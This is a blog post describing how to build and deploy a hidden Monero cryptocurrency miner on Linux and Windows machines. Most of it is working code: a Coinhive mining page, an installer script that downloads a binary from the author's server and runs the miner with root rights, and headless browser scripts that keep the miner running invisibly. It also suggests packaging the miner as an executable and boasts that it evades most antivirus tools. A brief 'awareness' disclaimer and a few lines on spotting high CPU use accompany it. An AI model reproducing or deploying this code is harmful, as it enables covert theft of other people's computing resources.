Saturday 13 January 2018

Writing a silent cryptocurrency miner (Monero) in 6 lines of code

Hidden Crypto currency mining has always been a game for blackhat hackers to make money out of it. After reading a lot of blog and news about hackers injecting silent miners to hacked computers, servers and websites, I thought of playing with it.

Note this blog is just for awareness of cryptocurrency hidden miners. I am not responsible for what my readers do with my codes. And I never suggest anyone deploy cryptocurrency miners on unauthorized computers. 

Lets first understand what mining is?

Cryptocurrency mining includes two functions, i.e., adding transactions to the blockchain (securing and verifying) and also releasing new currency. Individual blocks added by miners should contain a proof-of-work or PoW.
Mining needs a computer and a special program(provided by developers of the community), which helps miners compete with their peers in solving complicated mathematical problems. This would need huge computer resources. In regular intervals, miners would attempt to solve a block having the transaction data using cryptographic hash functions.

Now, as we already know that bitcoin transactions are kind of traceable. Hard but still possible. So in the recent trends, I found that most of the blackhat hackers shifted to monero mining. When I heard about monero in the news I wanted to figure out why monero?

The reasons are:-

1) Monero is private and untraceable  crypto currency.

But this doesn't fully answer our question because there are other cryptocurrencies too, which are untraceable like zcash, dash (earlier know as dark coin), verge, etc.

After a bit more research, I found my answer.

2) Monero uses "cryptonote" algorithm. Which rules out asci miners and hence mining is dependent on CPU and GPU, which means the mining difficulty is lower than what we have with bitcoin also it is better suited for regular consumer laptops and PCs.

This makes CPU mining feasible for users and a golden opportunity for hackers to bot/mass mine Monero on hacked computers.

Next question was how simple can this be?
Let's learn it by doing it!

Building a Monero Miner Linux (Ubuntu for example):-

Note:- I am a horrible coder. Hence I try to make my codes easy, to write less number of lines with less complexity no matter how horrible the code is. I am fine if it works :)

Preparing a list, how to make a silent miner!

1) A reliable miner manager.
2) Make it run invisible/silently on a system.

The best miner I could fine was a javascript one. Created by "https://coinhive.com/." It's free to signup, and they take 30% commission for using their miner.

But then this a browser based miner, to execute it on a hacked system we need to fire the miner in a system's browser and that too invisible.

As far as I knew that for browser automation, selenium is used.

Now we just embed our javascript code from coinhive and use our API public API key to trigger the miner.

Code file.html

<HTML>
<head>
<title>Test</title>
</head>
<body>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('3yvOKgHxX9ZsPB9x78IjhQ1C4xCDDhJx');
miner.start();
</script>
</body>
</HTML>



Next step is to open the HTML file silently on a system's browser. So we host our file somewhere . And make selenium trigger the URL.

First, we need to install dependencies. I wrote a script that installs all the dependencies in one go.

Code script.py

import os
os.system("apt-get -y install python3-pip")
os.system("pip3 install selenium")
os.system("pip3 install pyvirtualdisplay")
os.system("apt-get -y install firefox xvfb")
os.system("wget http://yourwebsite.com/geckodriver")
os.system("mv geckodriver /usr/local/bin")
os.system("chmod 7777 /usr/local/bin/geckodriver")
os.system("sudo python3 selenium_miner.py") 

Understanding the code:-
So we are installing python virtual display which is a wrapper of xvfb for python.
Selenium which is required for browser automation.
And then we need geckodriver for triggering Firefox from selenium.

Gecko driver for Linux can be downloaded from here

"https://github.com/mozilla/geckodriver/releases"

When we unzip the downloaded file from there, we get geckodriver file in it. In 5th line, I am just fetching the unzipped file from my own server.

In 6th line, I am moving it to the bin directly so as I don't have to mention the path of geckodriver in my further code

The last line finally calls the miner file to run, whose code is below.


Code selenium_miner.py

from pyvirtualdisplay import Display
from selenium import webdriver
display = Display(visible=0, size=(1024, 768))
display.start()
browser = webdriver.Firefox()
browser.get('http://www.yourwebsite.com/file.html')



This code simply made the visibility to zero and calls the URL where the miner is hosted (our file.html). Since I didn't exit the selenium, so the HTML file is open in a hidden firefox browser, till the system is running and the HTML file with the javascript code is using the systems CPU for mining Monero.

Windows miner:-

There are two ways of doing it.
Since there is no available wrapper for python virtual driver, I had to look for an alternative.

I found that phantomjs provides a ghost browser for windows

Code windows_miner1.py

from selenium import webdriver
path="C:\\Python27\\python\\phantom\\bin\\phantomjs.exe"
browser = webdriver.PhantomJS(path)
browser.get('http://www.yourwebsite.com/file.html')


In the code above the path, a variable is to set the path of your phantom js ghost driver which can be downloaded from here

"http://phantomjs.org/download.html"

In the bin folder, there is a phantomjs.exe. That path is to be mentioned in the variable.


This was my first approach. But then I went for a more straightforward approach. While strolling the internet, I found that chrome had enabled headless mode. That's all we need :)

Code windows_miner2.py

import os
import subprocess
path = subprocess.Popen(['cd'], stdout=subprocess.PIPE, shell=True)
for line in path.stdout:
continue
path.wait()
paths = (str(line).strip()) + "\Gchrome.exe --headless --disable-gpu --remote-debugging-port=9222 http://www.yourwebsite.com/file.html"
os.system(paths)

Where Gchome is your portable chrome executable or simply mention the file path of your chome.exe file.

Now many readers will think why did I ever write python code for windows miner because windows systems don't have python installed by default.

Because I am not good with c and c++ and I figured out py2exe. Tried and tested on my system, works like a charm!

Go to "http://py2exe.net" and get your executable.

Now comes the final question! How do I prevent hackers from stealing my CPU resources for their benefits?

My answer is feeling your loving PC <3. If you ever find your system fans working all the time even though you are not performing a heavy task. Go to your task manager and check if any unusual program is using all the remaining CPU resources.

If you see a sudden spike in CPU resources of your server. Use the command "top" in your server terminal to check if any unwanted program is using your CPU resources.

The best part is since everything is happening over the browser that too with javascript, it will go undetected from most of the anti-viruses.

All the source codes can be found here
https://github.com/Shashank-In/silent-monero-miner

Stay safe ;-)
Cheers Shashank